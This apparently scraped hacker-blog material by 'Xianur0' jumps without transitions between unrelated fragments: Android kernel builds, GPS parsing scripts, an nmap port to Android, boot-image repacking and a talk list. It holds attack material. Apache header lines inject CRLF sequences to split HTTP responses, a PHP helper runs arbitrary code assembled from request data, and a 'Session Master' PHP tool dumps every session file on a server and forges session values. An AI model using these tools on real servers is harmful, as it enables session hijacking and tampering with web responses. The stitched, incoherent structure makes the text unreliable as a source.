Header set Last-Modified "Xianur0 Was Here\nContent-Length: 25"
Header set xianur0 "Xianur0 Was Here\nContent-Length: 25\n\n<h1>Xianur0 Was Here</h1>"
Zer0-null:/home/xianur0/kernel-2.6.29-M860 # nc -vvv localhost 80
Connection to localhost 80 port [tcp/http] succeeded!
GET / HTTP/1.1
Host: localhost
HTTP/1.1 200 OK
Date: Fri, 22 Feb 2013 12:09:52 GMT
Server: Apache/2.2.21 (Linux/SUSE)
Last-Modified: Xianur0 Was Here
Content-Length: 25
ETag: "100809-2c-3e9564c23b600"
Accept-Ranges: bytes
Content-Length: 44
xianur0: Xianur0 Was Here
Content-Length: 25
<h1>Xianur0 Was Here</h1>
Content-Type: text/html
<html><body><h1>It works!</h1></body></html>
function eval2($php) {
// eval2 By Xianur0
$cabecera = "<?php\n";
foreach($_GET as $key => $valor) $cabecera .= '$_GET['.$key.'] = "'.$valor.'";';
foreach($_POST as $key => $valor) $cabecera .= '$_POST['.$key.'] = "'.$valor.'";';
foreach($_SERVER as $key => $valor) $cabecera .= '$_SERVER['.$key.'] = "'.$valor.'";';
foreach($HTTP_POST_FILES as $key => $valor) $cabecera .= '$HTTP_POST_FILES['.$key.'] = "'.$valor.'";';
$consulta = $cabecera.$php." ?>";
$descriptorspec = array(
0 => array("pipe", "r"),
1 => array("pipe", "w"),
2 => array("file", "/tmp/error-output.txt", "a")
);
$cwd = getcwd();
$process = proc_open('php', $descriptorspec, $pipes, $cwd);
if (is_resource($process)) {
fwrite($pipes[0], $consulta);
fclose($pipes[0]);
echo stream_get_contents($pipes[1]);
fclose($pipes[1]);
}
}
<?php
print `ls`;
?>
<html><title>Session Master By Xianur0</title><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><center>
<h1>Session Master By Xianur0</h1><br><img alt height="100" src="http://img59.imageshack.us/img59/9729/xianur0oq5.gif" width="100"><br><br><script type="text/Javascript">function expandcollapse (postid) { whichpost = document.getElementById(postid);if (whichpost.className=="postshown") { whichpost.className="posthidden"; } else { whichpost.className="postshown"; } }</script><style>.posthidden {display:none} .postshown {display:inline}</style>
<?php
@session_start();
function buscar() {
$tmp = @session_save_path();
print "<b>Directory of sessions: $tmp\n</b><br>";
$dir = @opendir($tmp);
while ($session = @readdir($dir))
{
if(preg_match("/^sess_/",$session)) {
$gestor = @fopen("$tmp/$session", "r");
$contenido = @fread($gestor, filesize("$tmp/$session"));
$contenido = @str_replace(';', ";\n<br><br>Session: ", $contenido);
fclose($gestor);
echo "<br>".$session."<br>\n";
if(!empty($contenido)){
$i++;
echo '<a href="javascript:expandcollapse('.$i.')">Show/Hide Code</a><br><span id="'.$i.'">
<br/><table height=1 cellSpacing=0 cellPadding=5 width="100%" bgColor=#FF0000 borderColor=#FF0000 border=1><tr><th>Session: '.$contenido.'</th></tr></table></span><br>';
}
}
}
}
function definir() {
$name = $_POST['name'];
$contenido = $_POST['valor'];
$_SESSION[$name] = $contenido;
}
function definidos() {
foreach ($_SESSION as $name => $valor)
{
print "<b>Name:</b> $name\n<br><b>Value:</b> $valor\n<br><br>";
}
}
function menu() {
$uri = $_SERVER['REQUEST_URI'];
print "<h2>Define SESSION</h2><br><form action='".$uri."?&action=definir' method='POST'>Name: <input type='text' name='name'><br>Value: <input type='text' name='valor'><br><input type='submit' value='Set!'></form><h2>Information:</h2><b><a href='$uri?&action=definidos'>Defined Sessions</a><br><a href='$uri?&action=buscar'>Sessions On The Server</a><b>";
}
if(isset($_GET['action']))
$action = $_GET['action'];
else $action="default";
switch ($action) {
case "buscar":
buscar();
break;
case "definir":
definir();
break;
case "definidos":
definidos();
break;
default:
menu();
break;
}
?>
M4ku4z and Megabyte with the students of the first graduating class
Colegio de Contadores Públicos de Cuautla, A.C. | SEP/DGP/CP001/10/030. |
Colegio de Contadores Públicos de Morelos, A.C. | SEP/DGP/CP001/10/031. |
Asociación Mexicana de Contadores Públicos. Colegio Profesional en el Distrito Federal, A.C | SEP/DGP/CP002/06 |
# adb pull /proc/config.gz && zcat /proc/config.gz > .config
160 KB/s (13860 bytes in 0.084s)
Zer0-null:/home/xianur0/originales/kernel-2.6.29-M860 # ./compilarkernel.sh
General setup --->
[*] Prompt for development and/or incomplete code/drivers
Networking --->
[*] Networking support
Wireless --->
<*> Generic IEEE 802.11 Networking Stack (mac80211)
Device Drivers --->
[*] Misc Devices --->
<M> EEPROM 93CX6 support
Network device support --->
Wireless LAN --->
[*] Wireless LAN (IEEE 802.11)
<M> Realtek 8187 and 8187B USB support
Cryptographic options --->
[*]Cryptographic API
<*>ARC4 cipher algorithm
Library routines
---CRC32 functions
Kernel: arch/arm/boot/Image is ready
Building modules, stage 2.
Kernel: arch/arm/boot/zImage is ready
MODPOST 10 modules
Copiando modulos al temporal...
Modificando boot.img...
Flasheando la imagen...
< waiting for device >
sending 'boot' (3504 KB)... OKAY
writing 'boot'... OKAY
Reiniciando el dispositivo...
rebooting...
Subiendo modulos...
Desconecte el dispositivo hasta que este termine de iniciar.
Zer0-null:/home/xianur0/kernel-2.6.29-M860 # patch < ../parche.patch
can't find file to patch at input line 3
Perhaps you should have used the -p or --strip option?
The text leading up to this was:
--------------------------
|--- drivers/usb/function/msm_hsusb.c 2013-02-22 04:40:41.487025262 -0600
|+++ drivers/usb/function/msm_hsusb.c.back 2013-02-22 04:38:07.597024271 -0600
--------------------------
File to patch: drivers/usb/function/msm_hsusb.c
patching file drivers/usb/function/msm_hsusb.c
Zer0-null:/home/xianur0/kernel-2.6.29-M860/xian-modules # make
Make module for target arm
make EXTRA_CFLAGS=-fno-pic -C /home/xianur0/kernel-2.6.29-M860 M=/home/xianur0/kernel-2.6.29-M860/xian-modules ARCH=arm CROSS_COMPILE=/home/xianur0/toolchain-4.6.3/bin/arm-linux-androideabi- modules
/bin/sh: /home/xianur0/kernel-2.6.29-M860/xian-modules/scripts/gcc-version.sh: No existe el fichero o el directorio
make[1]: se ingresa al directorio `/home/xianur0/kernel-2.6.29-M860'
Building modules, stage 2.
MODPOST 2 modules
make[1]: se sale del directorio `/home/xianur0/kernel-2.6.29-M860'
adb push teclado.ko /sdcard/
* daemon not running. starting it now on port 5037 *
* daemon started successfully *
81 KB/s (52093 bytes in 0.622s)
adb push mouse.ko /sdcard/
187 KB/s (51069 bytes in 0.265s)
Disfruta :D!
adb shell
# insmod /sdcard/mouse.ko
Nuevo Leon #192, Colonia Condesa, at the corner of Tlaxcala, doorbell 101, near the Chilpancingo Metrobus station
Metadata: Something Beyond the Visible
Detecting and Protecting Against ARP Spoofing Attacks
Social Engineering
Hacking Email Accounts: Reality or Myth
Penetrating Windows Servers
Identity and Access Management
Bypassing Uploaders
Cisco & Juniper Brute Force
Wardriving with iOS
Cracking Acunetix
NXT Controller: A Trojan for Fun
Raul Robles
Juan Angel Osorio
Helios Mier
Aaron Landa
Oscar Lopez, etc etc
$GPGSA,<1>,<2>,<3>,<4>,<5>,<6>,<7>,<8>,<9>,<10>,<11>,<12>,<13>,<14>,<15>,<16>,<17><Checksum><CR><LF>
M: Manual (forced to operate in 3D/2D)
A: Automatic
1=No fix, 2=2D, 3=3D
15 Position dilution of precision (PDOP)
16 Horizontal dilution of precision (HDOP)
17 Vertical dilution of precision (VDOP)
Zer0-null:/home/xianur0 # adb forward tcp:50000 tcp:50000
Zer0-null:/home/xianur0 # nc -vvv localhost 50000
nc: connect to localhost port 50000 (tcp) failed: Connection refused
Connection to localhost 50000 port [tcp/mrt] succeeded!
$GPGSV,4,1,16,01,,,,03,45,070,,04,,,,05,,,*4E
$GPGSV,4,2,16,06,27,054,,07,35,320,,08,13,293,,10,18,291,*7A
$GPGSV,4,3,16,11,11,151,,13,73,350,,16,20,036,,19,46,108,*7F
$GPGSV,4,4,16,20,13,185,,23,69,132,,28,12,233,,30,,,*44
[…]
# -*- coding: utf-8 -*-
import socket

def GPRMC(datos):
    # datos[1] is the status field; 'V' means the receiver has no valid fix
    if datos[1] != 'V':
        print("[-] Conectado con satelites!")
        print("[-] Hora actual: "+datos[0][0:2]+":"+datos[0][2:4]+":"+datos[0][4:6]+" con "+datos[0][7:]+" milisegundos")
        print("[-] Coordenadas actuales: ("+datos[2]+","+datos[4]+")")
        print("[-] Latitud Hemisferio: "+datos[3])
        print("[-] Longitud Hemisferio: "+datos[5])
        print("[-] Velocidad actual: "+datos[6]+" nudos")
        # The course field is decimal degrees and can be empty
        if datos[7]:
            azimut = float(datos[7])
            if azimut == 0 or azimut == 360:
                rumbo = 'Norte'
            elif azimut < 90:
                rumbo = 'Noreste'
            elif azimut == 90:
                rumbo = 'Este'
            elif azimut < 180:
                rumbo = 'Sureste'
            elif azimut == 180:
                rumbo = 'Sur'
            elif azimut < 270:
                rumbo = 'Suroeste'
            elif azimut == 270:
                rumbo = 'Oeste'
            else:
                rumbo = 'Noroeste'
            print("[-] Rumbo: "+rumbo+" ("+datos[7]+" grados)")
        print("[-] Fecha UTC: "+datos[8])

def GPGSV(datos):
    print(datos)
    print("\n[!] Información de satélites visibles: ")
    print("[-] Total Número de mensajes: "+datos[0])
    print("[-] Número de mensaje: "+datos[1])
    print("[-] Satélites visibles: "+datos[2])
    c = 0
    # Each satellite takes four fields; stop early on a short sentence
    for a in range(min(3, (len(datos) - 3) // 4)):
        print("[-] Satélite número: "+datos[3+c])
        print("\t[-] Grados de elevación: "+datos[3+c+1])
        print("\t[-] Asimut: "+datos[3+c+2])
        print("\t[-] SNR: "+datos[3+c+3]+" dB-Hz")
        c = c + 4

# The handlers must be defined before the read loop starts
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('localhost', 50000))
while True:
    linea = s.recv(250).decode('ascii', 'replace')
    if not linea:
        # An empty read means the peer closed the connection
        break
    print(linea)
    datos = linea.split(',')
    try:
        result = {
            '$GPRMC': GPRMC,
            '$GPGSV': GPGSV
        }[datos[0]](datos[1:])
    except KeyError:
        pass
# -*- coding: utf-8 -*-
import socket

# Connect to the GPS port forwarded with "adb forward tcp:50000 tcp:50000"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('localhost', 50000))

def GPRMC(datos):
    # datos[1] is the status field; 'V' means the receiver has no valid fix
    if datos[1] != 'V':
        print("[!] Conectado con satelites!")
        print("[-] Hora actual: "+datos[0][0:2]+":"+datos[0][2:4]+":"+datos[0][4:6]+" con "+datos[0][7:]+" milisegundos")
        print("[-] Coordenadas actuales: ("+datos[2]+","+datos[4]+")")
        print("[-] Latitud Hemisferio: "+datos[3])
        print("[-] Longitud Hemisferio: "+datos[5])
        print("[-] Velocidad actual: "+datos[6]+" nudos")
        # The course field is decimal degrees and can be empty
        if datos[7]:
            azimut = float(datos[7])
            if azimut == 0 or azimut == 360:
                rumbo = 'Norte'
            elif azimut < 90:
                rumbo = 'Noreste'
            elif azimut == 90:
                rumbo = 'Este'
            elif azimut < 180:
                rumbo = 'Sureste'
            elif azimut == 180:
                rumbo = 'Sur'
            elif azimut < 270:
                rumbo = 'Suroeste'
            elif azimut == 270:
                rumbo = 'Oeste'
            else:
                rumbo = 'Noroeste'
            print("[-] Rumbo: "+rumbo+" ("+datos[7]+" grados)")
        print("[-] Fecha UTC: "+datos[8])

def GPGSV(datos):
    print(datos)
    print("\n[!] Información de satélites visibles: ")
    print("[-] Total Número de mensajes: "+datos[0])
    print("[-] Número de mensaje: "+datos[1])
    print("[-] Satélites visibles: "+datos[2])
    c = 0
    # Each satellite takes four fields; stop early on a short sentence
    for a in range(min(3, (len(datos) - 3) // 4)):
        print("[-] Satélite número: "+datos[3+c])
        print("\t[-] Grados de elevación: "+datos[3+c+1])
        print("\t[-] Asimut: "+datos[3+c+2])
        print("\t[-] SNR: "+datos[3+c+3]+" dB-Hz")
        c = c + 4

while True:
    linea = s.recv(250).decode('ascii', 'replace')
    if linea == '':
        raise RuntimeError("socket connection broken")
    datos = linea.split(',')
    try:
        result = {
            '$GPRMC': GPRMC,
            '$GPGSV': GPGSV
        }[datos[0]](datos[1:])
    except KeyError:
        pass
Zer0-null:/home/xianur0 # wget http://cdimage.debian.org/debian-cd/current/armel/iso-cd/debian-6.0.6-armel-xfce+lxde-CD-1.iso
http://ftp.fr.debian.org/debian/pool/main
http://ftp.fr.debian.org/debian/pool/main/n/nmap/nmap_5.00-3_armel.deb
Zer0-null:/home/xianur0/debian-arm # perl export.pl
Deb2Droid v0.1 by Xianur0
Use: ./export.pl [pool dir] [deb]
Zer0-null:/home/xianur0/debian-arm/nmap # perl export.pl ../pool/main/ n/nmap_5.00-3_armel.deb
[...]
[-] Instaladas!
[-] Paquete y dependencias extraidos correctamente!
Zer0-null:/home/xianur0/debian-arm/nmap # ls
bin config etc export.pl lib sbin selinux shlibs symbols templates usr var
Zer0-null:/home/xianur0/debian-arm/nmap # du -sh .
68M .
Zer0-null:/home/xianur0/debian-arm/nmap/usr/bin # objdump -x nmap | grep NEEDED
NEEDED libpcre.so.3
NEEDED libpcap.so.0.8
NEEDED libssl.so.0.9.8
NEEDED libcrypto.so.0.9.8
NEEDED liblua5.1.so.0
NEEDED libdl.so.2
NEEDED libstdc++.so.6
NEEDED libm.so.6
NEEDED libgcc_s.so.1
NEEDED libc.so.6
Zer0-null:/home/xianur0/debian-arm/nmap/usr/bin # mkdir -p /home/xianur0/nmap-final/bin/
Zer0-null:/home/xianur0/debian-arm/nmap/usr/bin # cp nmap /home/xianur0/nmap-final/bin/
Zer0-null:/home/xianur0/debian-arm/nmap/usr/bin # mkdir -p /home/xianur0/nmap-final/lib
Zer0-null:/home/xianur0/debian-arm/nmap/usr/bin # cp ../../lib/libpcre.so.3 /home/xianur0/nmap-final/lib/
Zer0-null:/home/xianur0/debian-arm/nmap/usr/bin # cp ../lib/libpcap.so.0.8 /home/xianur0/nmap-final/lib/
Zer0-null:/home/xianur0/debian-arm/nmap/usr/bin # cp ../lib/libssl.so.0.9.8 /home/xianur0/nmap-final/lib/
Zer0-null:/home/xianur0/debian-arm/nmap/usr/bin # cp ../lib/libcrypto.so.0.9.8 /home/xianur0/nmap-final/lib/
Zer0-null:/home/xianur0/debian-arm/nmap/usr/bin # cp ../lib/liblua5.1.so.0 /home/xianur0/nmap-final/lib/
Zer0-null:/home/xianur0/debian-arm/nmap/usr/bin # cp ../../lib/libdl.so.2 /home/xianur0/nmap-final/lib/
Zer0-null:/home/xianur0/debian-arm/nmap/usr/bin # cp ../lib/libstdc++.so.6 /home/xianur0/nmap-final/lib/
Zer0-null:/home/xianur0/debian-arm/nmap/usr/bin # cp ../../lib/libm.so.6 /home/xianur0/nmap-final/lib/
Zer0-null:/home/xianur0/debian-arm/nmap/usr/bin # cp ../../lib/libgcc_s.so.1 /home/xianur0/nmap-final/lib/
Zer0-null:/home/xianur0/debian-arm/nmap/usr/bin # cp ../../lib/libc.so.6 /home/xianur0/nmap-final/lib/
Zer0-null:/home/xianur0/debian-arm/nmap/usr/bin # objdump -x * | grep -i NEEDED | sort -n | uniq
NEEDED libacl.so.1
NEEDED libattr.so.1
NEEDED libbz2.so.1.0
NEEDED libcrypto.so.0.9.8
NEEDED libcrypt.so.1
NEEDED libc.so.6
NEEDED libdl.so.2
NEEDED libgcc_s.so.1
NEEDED liblua5.1.so.0
NEEDED liblzma.so.2
NEEDED libm.so.6
NEEDED libpcap.so.0.8
NEEDED libpcreposix.so.3
NEEDED libpcre.so.3
NEEDED libperl.so.5.10
NEEDED libpthread.so.0
NEEDED librt.so.1
NEEDED libselinux.so.1
NEEDED libssl.so.0.9.8
NEEDED libstdc++.so.6
NEEDED libz.so.1
Zer0-null:/home/xianur0/debian-arm/nmap/usr/bin # ls -l /home/xianur0/nmap-final/lib/
total 6712
-rwxr-xr-x 1 root root 122340 ene 14 04:53 ld-linux.so.3
-rw-r--r-- 1 root root 25412 ene 14 05:01 libacl.so.1
-rw-r--r-- 1 root root 14576 ene 14 05:02 libattr.so.1
-rw-r--r-- 1 root root 74552 ene 14 04:57 libbz2.so.1.0
-rw-r--r-- 1 root root 1247604 ene 14 04:26 libcrypto.so.0.9.8
-rw-r--r-- 1 root root 34376 ene 14 05:00 libcrypt.so.1
-rwxr-xr-x 1 root root 1205684 ene 14 04:27 libc.so.6
-rw-r--r-- 1 root root 9808 ene 14 04:26 libdl.so.2
-rw-r--r-- 1 root root 47212 ene 14 04:27 libgcc_s.so.1
-rw-r--r-- 1 root root 143460 ene 14 04:26 liblua5.1.so.0
-rw-r--r-- 1 root root 127380 ene 14 04:54 liblzma.so.2
-rw-r--r-- 1 root root 652912 ene 14 04:27 libm.so.6
-rw-r--r-- 1 root root 193012 ene 14 05:01 libpcap.so.0.8
-rw-r--r-- 1 root root 5892 ene 14 04:56 libpcreposix.so.3
-rw-r--r-- 1 root root 186208 ene 14 04:25 libpcre.so.3
-rw-r--r-- 1 root root 1251792 ene 14 04:56 libperl.so.5.10
-rwxr-xr-x 1 root root 120505 ene 14 04:53 libpthread.so.0
-rw-r--r-- 1 root root 26632 ene 14 04:55 librt.so.1
-rw-r--r-- 1 root root 100312 ene 14 04:54 libselinux.so.1
-rw-r--r-- 1 root root 270772 ene 14 04:26 libssl.so.0.9.8
-rw-r--r-- 1 root root 874176 ene 14 04:27 libstdc++.so.6
-rw-r--r-- 1 root root 82124 ene 14 04:53 libz.so.1
Zer0-null:/home/xianur0/debian-arm/nmap/usr/bin # ls -alh /home/xianur0/nmap-final/bin
total 620K
drwxr-xr-x 2 root root 4,0K ene 14 04:24 .
drwxr-xr-x 4 root root 4,0K ene 14 04:25 ..
-rwxr-xr-x 1 root root 609K ene 14 04:24 nmap
Zer0-null:/home/xianur0/debian-arm/nmap/usr/bin # du -sh /home/xianur0/nmap-final/
7,2M /home/xianur0/nmap-final/
Zer0-null:/home/xianur0/debian-arm/nmap/usr/bin # mkdir -p /home/xianur0/nmap-final/proc
Zer0-null:/home/xianur0/debian-arm/nmap/usr/bin # mkdir -p /home/xianur0/nmap-final/dev
Zer0-null:/home/xianur0/debian-arm/nmap/usr/bin # mkdir -p /home/xianur0/nmap-final/sys
Zer0-null:/home/xianur0/debian-arm/nmap/usr/bin # adb push /home/xianur0/nmap-final /sdcard/nmap
# cp -R /sdcard/nmap /data/local/nmap
# cd /data/local/nmap
# mount -o bind /proc proc
# mount -o bind /dev dev
# mount -o bind /sys sys
# chroot /data/local/nmap /bin/nmap -V
Nmap version 5.00 ( http://nmap.org )
#!/usr/bin/perl -w
require Digest::MD5;
my $base = $ARGV[0];
my $arg1 = $ARGV[1] || die(("\t"x3)."Deb2Droid v0.1 by Xianur0\n\nUse: ./export.pl [pool dir] [deb]\n");
my @packages = ($arg1);
our @extraidos = ();
our @depsinstaladas = ();
my $install = 1;
system("mkdir var && mkdir var/lib && mkdir var/lib/dpkg && mkdir var/lib/dpkg/info");
open STATUS,">>var/lib/dpkg/status";
sub copiar {
my ($origen,$destino) = @_;
open(FILES,"<".$origen) || return 0;
my $contenido = "";
binmode FILES;
while(<FILES>) {
$contenido .=$_;
}
close(FILES);
open FILED,">".$destino;
binmode FILED;
print FILED $contenido;
close(FILED);
}
sub locatedep {
my ($dir,$dep) = @_;
$dir .= "/" if($dir !~ /\/$/);
my @files = <$dir*>;
foreach my $file (@files) {
my $tmpfile = $file;
$tmpfile =~ s/^.+\///g;
if(-d $file) {
if($file !~ /^\.+$/){
return 1 if(locatedep($file,$dep));
}
}
elsif(-f $file && $dep eq substr($tmpfile,0,length($dep)) && $file =~ /u?deb$/) {
print "[-] Posible paquete encontrado: ".$dep." ? ".$file."\n";
print "ar x ".$file." && (tar -xzvf data.tar.gz > archivos.list) && tar -xzvf control.tar.gz 2>&1\n";
if($install == 1){
print "[-] Extrayendo paquete...\n";
return 1 if(extract($file,$dep));
}
}
}
return 0;
}
sub in_array
{
my ($arr,$search_for) = @_;
my %items = map {$_ => 1} @$arr; # create a hash out of the array values
return (exists($items{$search_for}))?1:0;
}
sub finddeps {
my $searchpackagename = "";
$searchpackagename = $_[0] if($#_ >= 0);
$searchpackagename = "" unless defined $searchpackagename;
open CONTROL,"<control" || return;
open MD5,"<md5sums";
open CONFFILES,"<conffiles";
my $control = "";
my $md5 = "";
my $conffiles = "";
return unless(fileno(MD5));
while(<CONTROL>) {
$control.=$_;
}
close(CONTROL);
my $packagename = "";
$packagename = $1 if($control =~ /Package: ([^\r\n]+)/);
print "Paquete: ".$searchpackagename."=? ".$packagename."\n";
if($searchpackagename ne "" && $searchpackagename ne $packagename) {
return 0;
}
if(fileno(MD5)){
while(<MD5>) {
$md5.=$_;
}
close(MD5);
}
my $status = "Status: install ok not-installed";
if(fileno(CONFFILES)) {
while(<CONFFILES>) {
my $f = $_;
$f =~ s/[\r\n]+//g;
open F, ".".$f;
my $cf = "";
while(<F>){
$cf .= $_;
}
$conffiles.=" ".$f." ".Digest::MD5::md5_hex($cf)."\n";
}
close(CONFFILES);
$control =~ s/(Description:\s+)/Conffiles:\n$conffiles$1/;
$status = "Status: install reinstreq half-configured";
}
checkmd5($md5);
my $depsstring = "";
$depsstring = $1 if($control =~ /Depends: ([^\r\n]+)/);
copiar("archivos.list","var/lib/dpkg/info/".$packagename.".list");
copiar("postinst","var/lib/dpkg/info/".$packagename.".postinst");
copiar("preinst","var/lib/dpkg/info/".$packagename.".preinst");
copiar("postrm","var/lib/dpkg/info/".$packagename.".postrm");
copiar("prerm","var/lib/dpkg/info/".$packagename.".prerm");
open MD5OUT,">>var/lib/dpkg/info/".$packagename.".md5sums";
print MD5OUT $md5;
$md5 = "";
if($depsstring eq ""){
print "[-] Sin dependencias... continuando...\n";
return 1;
}
my @deps = ($depsstring =~ /[^\,]+/g);
my $i = 0;
for $dep (@deps) {
$dep =~ s/^\s+//g;
my $version = $dep;
$version =~ s/(.+\()//g;
$version =~ s/\)//g;
my $condicion = "";
if($version=~/^(>|>=|<=|==|<)\s+([\:\.\d]+)$/){
($condicion,$version) = ($1,$2);
} else {$version="";}
$dep =~ s/\s+.+$//g;
$deps[$i] = $dep;
$i++;
}
print "[-]Instalando dependencias....\n\n";
for $dep (@deps) {
my $cdep = $#deps;
if(!in_array(\@depsinstaladas,$dep)){
push(@depsinstaladas,$dep);
print "[-] Buscando paquete: ".$dep."...\n";
if(!locatedep($base,$dep)) {
die("\n[!] No se pudo resolver la dependencia: ".$dep."\n");
}
}
}
print "[-] Agregando a status...\n";
$control =~s/^Package\:([^\r\n]+)/Package:$1\n$status/;
print $control."\n";
print STATUS $control."\n\n";
print "[-] Instaladas!\n";
return 1;
}
sub extract {
my ($p,$packname) = @_;
if(in_array(\@extraidos,$p)){
return 1;
}
push(@extraidos,$p);
my $descarte = "";
system("ar x ".$p." && (tar -xzvf data.tar.gz > archivos.list) && tar -xzvf control.tar.gz 2>&1");
my $estado = finddeps($packname);
system("rm md5sums 2>&1 | rm control 2>&1 | rm archivos.list 2>&1 | rm debian 2>&1 | rm debian-binary 2>&1 | rm conffiles 2>&1 | rm postinst 2>&1 | rm preinst 2>&1 | rm postrm 2>&1 | rm prerm 2>&1 | rm data.tar.gz 2>&1 | rm control.tar.gz 2>&1 | echo ");
return $estado;
}
sub checkmd5 {
my $md5 = $_[0];
my @lineas = split(/[\r\n]/,$md5);
for $linea (@lineas) {
my ($md5,$objeto) = ($linea =~ /^([\w\d]+)\s+(.+)$/);
open OBJETO,"<".$objeto;
binmode OBJETO;
my $bin = "";
while(<OBJETO>){
$bin .=$_;
}
my $md5real = Digest::MD5::md5_hex($bin);
unless($md5 eq $md5real) {
die("\n[!] MD5 incorrecto: ".$md5."!=".$md5real." en: ${objeto}\n");
} else {
print "\r[-] Probando MD5: ${md5} ${md5real} ${objeto}\r";
}
}
print "\n[-] MD5's correctos!\n";
}
for $package (@packages){
extract($base.$package);
}
print "[-] Paquete y dependencias extraidos correctamente!\n";
The title of this post will surely be very controversial and draw a lot of criticism, but there are reasons for writing this "manual" and giving it this kind of title. To begin with, "Android for hackers" posts usually amount to nothing more than a list of apps to install that will do all the work, and it is certainly hard to find anything worthwhile that is not already scattered all over the internet. Besides, all of that is script-kiddie business, not the business of "hackers" as the title suggests. For this simple reason I will take on the task of putting together a manual on how to turn this:
# mount | grep /system
/dev/block/mmcblk0p14 /system ext4 rw,relatime,barrier=1,data=ordered 0 0
# mount | grep /dev/block/mmcblk0p
/dev/block/mmcblk0p14 /system ext4 rw,relatime,barrier=1,data=ordered 0 0
/dev/block/mmcblk0p21 /data ext4 rw,nosuid,nodev,noatime,errors=continue,barrier=1,data=ordered 0 0
/dev/block/mmcblk0p15 /persist ext4 rw,nosuid,nodev,relatime,barrier=1,data=ordered 0 0
/dev/block/mmcblk0p16 /cache ext4 rw,nosuid,nodev,relatime,barrier=1,data=ordered 0 0
/dev/block/mmcblk0p18 /drm ext4 rw,nosuid,nodev,relatime,barrier=1,data=ordered 0 0
/dev/block/mmcblk0p22 /mpt ext4 rw,nosuid,nodev,relatime,barrier=1,data=ordered 0 0
# ls -l /dev/block/mmcblk0p*
brw------- root root 179, 1 2013-01-04 00:13 mmcblk0p1
brw------- root root 179, 10 2013-01-13 20:06 mmcblk0p10
brw------- root root 179, 11 2013-01-13 19:48 mmcblk0p11
brw------- root root 179, 12 2013-01-04 00:13 mmcblk0p12
brw------- root root 179, 13 2013-01-04 00:13 mmcblk0p13
brw------- root root 179, 14 2013-01-04 00:13 mmcblk0p14
brw------- root root 179, 15 2013-01-04 00:13 mmcblk0p15
brw------- root root 179, 16 2013-01-04 00:13 mmcblk0p16
brw-rw---- system system 179, 17 2013-01-04 00:13 mmcblk0p17
brw-rw---- system system 179, 18 2013-01-04 00:13 mmcblk0p18
brw------- root root 179, 19 2013-01-04 00:13 mmcblk0p19
brw------- root root 179, 2 2013-01-04 00:13 mmcblk0p2
brw------- root root 179, 20 2013-01-04 00:13 mmcblk0p20
brw------- root root 179, 21 2013-01-04 00:13 mmcblk0p21
brw------- root root 179, 22 2013-01-04 00:13 mmcblk0p22
brw------- root root 179, 23 2013-01-04 00:13 mmcblk0p23
brw------- root root 179, 3 2013-01-04 00:13 mmcblk0p3
brw------- root root 179, 4 2013-01-04 00:13 mmcblk0p4
brw------- root root 179, 5 2013-01-04 00:13 mmcblk0p5
brwxrwx--- root radio 179, 6 2013-01-04 00:13 mmcblk0p6
brw------- root root 179, 7 2013-01-04 00:13 mmcblk0p7
brwxrwx--- root system 179, 8 2013-01-04 00:13 mmcblk0p8
brw------- root root 179, 9 2013-01-04 00:13 mmcblk0p9
# cat /proc/mtd
dev: size erasesize name
mtd0: 00500000 00020000 "boot"
mtd1: 00500000 00020000 "recovery"
mtd2: 00140000 00020000 "misc"
mtd3: 00060000 00020000 "splash"
mtd4: 0aa00000 00020000 "system"
mtd5: 04600000 00020000 "cache"
mtd6: 0bda0000 00020000 "userdata"
mtd7: 01400000 00020000 "userdata2"
# cat /proc/mtd
/proc/mtd: No such file or directory
# dd if=/dev/block/mmcblk0p1 of=/sdcard/mmcblk0p1
40+0 records in
40+0 records out
20480 bytes transferred in 0.004 secs (5120000 bytes/sec)
Zer0-null:/home/xianur0 # adb pull /sdcard/mmcblk0p1 mmcblk0p1
236 KB/s (20480 bytes in 0.084s)
Zer0-null:/home/xianur0 # binwalk mmcblk0p1
DECIMAL HEX DESCRIPTION
-------------------------------------------------------------------------------------------------------
Zer0-null:/home/xianur0/L3-back # binwalk mmcblk0p9
DECIMAL HEX DESCRIPTION
-------------------------------------------------------------------------------------------------------
20010 0x4E2A gzip compressed data, from Unix, last modified: Thu Jul 26 05:55:33 2012, max compression
[…]
Zer0-null:/home/xianur0/L3-back # perl -e 'my $tmp="";open FILE,"<mmcblk0p9"; read FILE,$tmp,8; print $tmp;'
ANDROID!
Zer0-null:/home/xianur0/L3-back # abootimg -i mmcblk0p9
* file name = mmcblk0p9
* image size = 8388608 bytes (8.00 MB)
page size = 4096 bytes
* Boot Name = ""
* kernel size = 3312024 bytes (3.16 MB)
ramdisk size = 490986 bytes (0.47 MB)
* load addresses:
kernel: 0x00208000
ramdisk: 0x01300000
tags: 0x00200100
* cmdline = androidboot.hardware=e0
- id = 0x099380a2 0xe8c73d9d 0x7ec0b3eb 0xb7d342d1 0xfda995b2 0x00000000 0x00000000 0x00000000
Zer0-null:/home/xianur0/L3-back # abootimg -x mmcblk0p9
writing boot image config in bootimg.cfg
extracting kernel in zImage
extracting ramdisk in initrd.img
Zer0-null:/home/xianur0/L3-back # mkdir ramdisk && cd ramdisk && gzip -dc ../initrd.img | cpio -i
2074 blocks
Zer0-null:/home/xianur0/L3-back/ramdisk # ls
chargerimages dev init.goldfish.rc init.rc lgdms.fota_update.rc sbin ueventd.goldfish.rc
data init init.qcom.rc init.target.rc lgsecurity.rc sys ueventd.rc
default.prop init.e0.rc init.qcom.sh lgdms.fota.rc proc system
Zer0-null:/home/xianur0/L3-back/ramdisk # find . | cpio -o -H newc | gzip > ../new-initrd.img
2074 blocks
Zer0-null:/home/xianur0/L3-back # cp mmcblk0p9 mmcblk0p9.new && abootimg -u mmcblk0p9.new -r new-initrd.img
reading ramdisk from new-initrd.img
Writing Boot Image mmcblk0p9.new
Zer0-null:/home/xianur0/L3-back # adb push mmcblk0p9.new /sdcard/
# dd if=/sdcard/mmcblk0p9.new of=/mmcblk0p9
Zer0-null:/home/xianur0/L3-back # fastboot flash boot mmcblk0p9.new
Zer0-null:/home/xianur0/L3-back # fastboot boot mmcblk0p9.new
Zer0-null:/home/xianur0/L3-back # fastboot boot zImage initrd.img
HTTP/1.1 200 OK
Content-Type: text/plain; charset=UTF-8
Date: Sun, 13 Jan 2013 02:25:35 GMT
Server: xianur0-to-me
Content-Length: 14
Content-Encoding: gzip
Content-Encoding: none
(respuesta.txt)
# nc -vvvl 8080 > consulta.txt < respuesta.txt
